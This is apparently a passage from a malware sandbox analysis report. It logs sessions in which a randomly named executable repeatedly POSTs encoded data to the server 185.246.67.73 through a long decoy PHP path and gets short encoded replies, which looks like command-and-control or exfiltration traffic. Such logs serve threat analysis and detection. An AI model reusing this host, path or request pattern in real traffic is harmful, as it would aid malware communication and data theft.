                                                                                                                      Data Ascii: PZCQ[CUUT^PY[ZY\YXYVWSQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z3[1)5!3*.%4:_.8'/%>&97,<; ]!![ (


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      41192.168.2.449833185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:17.478996038 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:17.915318012 CET1904OUTData Raw: 50 5d 43 5c 5e 47 55 52 54 5e 50 59 5b 59 59 5c 59 58 59 58 57 53 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P]C\^GURT^PY[YY\YXYXWSQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$-6%_%59:B9";=,; T%>136Y2+&#<',+ ]!![ $
                                                                                                                      Dec 8, 2024 15:28:18.795914888 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:19.028336048 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:18 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 0f 26 26 23 1d 29 14 31 04 26 3c 24 07 33 3b 33 5c 3e 33 2c 03 33 00 24 14 2d 29 30 0e 34 2c 01 00 27 3d 0d 04 20 3f 33 53 3a 38 20 5a 06 10 21 19 25 3f 3f 10 2b 5d 3a 02 32 38 35 41 21 24 2b 43 27 2e 3c 09 2a 29 39 03 23 11 3c 0a 25 13 07 54 3a 36 31 06 32 0e 01 54 31 1c 2c 55 0f 1f 26 1b 33 32 09 56 23 19 22 1d 22 09 3f 5d 26 0b 2d 0f 35 01 2f 09 2b 03 24 11 3c 54 23 02 22 31 2c 07 2c 3b 2e 04 2a 31 3b 55 25 2c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :&&#)1&<$3;3\>3,3$-)04,'= ?3S:8 Z!%??+]:285A!$+C'.<*)9#<%T:612T1,U&32V#""?]&-5/+$<T#"1,,;.*1;U%, S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      42192.168.2.449837185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:17.698935032 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:18.044586897 CET2584OUTData Raw: 55 5b 43 55 5b 41 55 50 54 5e 50 59 5b 5b 59 5d 59 54 59 5f 57 57 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U[CU[AUPT^PY[[Y]YTY_WWQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$%^&)\"#Z9'54>^;($=820%&].Y7</_,; ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:19.037163973 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:19.268606901 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:18 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      43192.168.2.449838185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:19.502793074 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:19.857165098 CET2584OUTData Raw: 50 5a 43 57 5e 44 50 52 54 5e 50 59 5b 5c 59 58 59 5e 59 5b 57 54 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PZCW^DPRT^PY[\YXY^Y[WTQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3)_19"##:.% ^*,^;3>Y%0%';2X ??/ ]!![ 0
                                                                                                                      Dec 8, 2024 15:28:20.866543055 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:21.100059032 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:20 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      44192.168.2.449844185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:21.340581894 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:21.685225010 CET2580OUTData Raw: 50 53 46 50 5b 48 55 5f 54 5e 50 59 5b 58 59 52 59 5d 59 57 57 51 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSFP[HU_T^PY[XYRY]YWWQQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-31%65U=X: !8;$$&%&(17<7, ]!![
                                                                                                                      Dec 8, 2024 15:28:22.673475981 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:22.908338070 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:22 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.449850185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:23.158510923 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:23.513469934 CET2580OUTData Raw: 50 59 43 54 5b 43 55 54 54 5e 50 59 5b 58 59 5a 59 5b 59 5a 57 57 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYCT[CUTT^PY[XYZY[YZWWQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-0>)$:&"*.B24:_, S' Z%01* ;+ ]!![ $


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.449856185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:24.165904045 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:24.513361931 CET1904OUTData Raw: 55 5f 43 56 5b 46 55 55 54 5e 50 59 5b 5b 59 5f 59 5c 59 56 57 54 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_CV[FUUT^PY[[Y_Y\YVWTQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3&:9Z50".$&#>Z8W%=3&%:#Z8; ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:25.562987089 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:25.800937891 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:25 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 0f 27 26 37 56 2a 2a 22 1e 25 12 20 06 30 28 01 5d 29 20 34 02 24 17 30 17 3b 04 2b 1c 23 05 3c 58 24 3d 09 02 22 3c 01 56 2e 12 20 5a 06 10 22 05 25 06 20 00 28 2b 3d 5e 25 28 3d 44 35 19 20 1c 33 5b 2f 52 3d 2a 3e 5b 21 3f 09 52 32 3e 2d 54 2e 26 21 05 26 20 37 57 26 26 2c 55 0f 1f 26 16 24 0c 0d 56 34 51 22 57 21 23 27 14 25 1c 3d 0b 35 3c 24 51 2a 3e 2b 00 3f 32 2f 04 34 0c 01 5e 2e 02 25 5d 2a 0c 28 0d 27 06 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :'&7V**"% 0(]) 4$0;+#<X$="<V. Z"% (+=^%(=D5 3[/R=*>[!?R2>-T.&!& 7W&&,U&$V4Q"W!#'%=5<$Q*>+?2/4^.%]*(' S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.449857185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:24.287689924 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:24.638345003 CET2584OUTData Raw: 50 59 46 50 5b 47 55 5f 54 5e 50 59 5b 5e 59 5c 59 5c 59 56 57 52 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYFP[GU_T^PY[^Y\Y\YVWRQXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z3=1*"66:$.]4*^,'10.\&+=4<$, ]!![ 8
                                                                                                                      Dec 8, 2024 15:28:26.934431076 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:27.168299913 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:26 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      48192.168.2.449863185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:27.409579039 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:27.764698029 CET2584OUTData Raw: 50 53 43 5d 5b 47 50 52 54 5e 50 59 5b 50 59 5f 59 5e 59 5c 57 51 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSC][GPRT^PY[PY_Y^Y\WQQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y3Y%):!09-4 X.(R$X%V6^&(>7?']; ]!![
                                                                                                                      Dec 8, 2024 15:28:28.752886057 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:28.992626905 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:28 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      49192.168.2.449869185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:29.240799904 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:29.591556072 CET2584OUTData Raw: 50 53 43 54 5b 46 55 5e 54 5e 50 59 5b 5b 59 5a 59 5f 59 58 57 51 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSCT[FU^T^PY[[YZY_YXWQQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'!X&)55\94*Y ;9/,%.<X%0-&(= ,; ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:30.578612089 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:30.813620090 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:30 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      50192.168.2.449875185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:30.933264971 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:31.279798985 CET1904OUTData Raw: 50 59 43 53 5b 42 55 57 54 5e 50 59 5b 5c 59 5f 59 58 59 59 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYCS[BUWT^PY[\Y_YXYYWUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$["29&!3:546,^#0>_21&_#(/; ]!![ 0
                                                                                                                      Dec 8, 2024 15:28:32.343777895 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:32.576565981 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:32 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 1f 31 43 23 1e 3d 04 31 05 32 3f 3f 59 24 16 2f 18 2b 20 2c 04 24 5f 24 5c 38 3a 23 54 37 05 23 06 25 3d 05 00 35 3c 0d 51 2e 02 20 5a 06 10 21 5d 31 2f 01 58 3c 05 2a 05 25 06 25 42 36 24 3b 40 25 3d 2f 52 29 3a 36 5d 23 01 2b 11 27 3d 22 0a 2e 35 04 5c 27 23 37 55 27 36 2c 55 0f 1f 25 0b 27 22 3c 0a 22 37 36 56 35 20 0a 04 32 1c 39 08 36 01 2c 18 28 13 28 5b 28 32 24 5a 22 21 2c 06 39 28 31 5e 2a 31 24 08 24 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 91C#=12??Y$/+ ,$_$\8:#T7#%=5<Q. Z!]1/X<*%%B6$;@%=/R):6]#+'=".5\'#7U'6,U%'"<"76V5 296,(([(2$Z"!,9(1^*1$$< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      51192.168.2.449876185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:31.050756931 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
